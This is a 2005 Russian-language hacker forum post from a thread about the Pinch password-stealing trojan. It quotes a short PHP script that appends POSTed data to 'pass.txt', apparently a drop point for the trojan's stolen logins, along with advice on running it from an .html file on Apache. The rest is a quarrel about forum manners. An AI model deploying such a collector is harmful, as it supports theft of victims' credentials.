Тема: pinch-http
Показать сообщение отдельно

Старый 29.10.2005, 23:49
ZaCo
Banned
Провел на форуме:
4610226

Теперь все дружно смотрим сюда
Цитата:
2Ван - ты вообще понимаешь что такое скрипт??? видимо нет! Обьясняю:
Цитата:
<?php
$email=$_POST['a'];
$subject=$_POST['b'];
$msg=$_POST['c'];
if (isset($email) and isset($subject) and isset($msg))
{
$fp = fopen("pass.txt", "a");
If($fp)
{
$w = $msg."\n\n\n";
fwrite($fp, $w);
fclose($fp);
}
}
?>

это ты можешь засунуть в хтмл файл на сервере, если стоят права на выполнение и апач например будет считать *.html за скрипт, то он выполнятся! Причём этот исходник не будт видно в сурсе, код выполняется сначала, на сервере а резёльтат работы ты видишь в браузере. Значит код для хтмл файла будет выглядеть так как ты написал в первом посте.
ЗЫ какой билдер?
Это мой первый пост здесь! Дальше
Цитата:
это ты можешь засунуть в хтмл файл на сервере, если стоят права на выполнение и апач например будет считать *.html за скрипт, то он выполнятся! Причём этот исходник не будт видно в сурсе, код выполняется сначала, на сервере а резёльтат работы ты видишь в браузере. Значит код для хтмл файла будет выглядеть так как ты написал в первом посте.
2Ван - ты меня извини но кажется я дал тебе нормальный ответ!
Далее
Цитата:
Извиняюсь за безграммотность! С пинчами никогда дела не имел. Знаю, что это только троян=))))
Здесь я не кричу! Уверяю Вас! Я (именно Я) с пинчами дела никогда не имел!
А вот дальше
Цитата:
И что??? надо об этом кричать???
Помоему ты первый кто закричал в этой теме.
Цитата:
2ALL Народ давайте относиться к друг другу лояльно. Помните не стыдно не знать а стыдно не учиться. Если человек задает на ваш взляд тупой вопрос это еще не повод хамить!!!
Это я так понимаю не к всем, а только ко мне относится! Замечательно! А где я хамил человеку который задал вопрос(а тут только Ван задвал вопросы)? Вы мне покажите!
PS Вы перед тем как писать что либо читайте всё с самого начала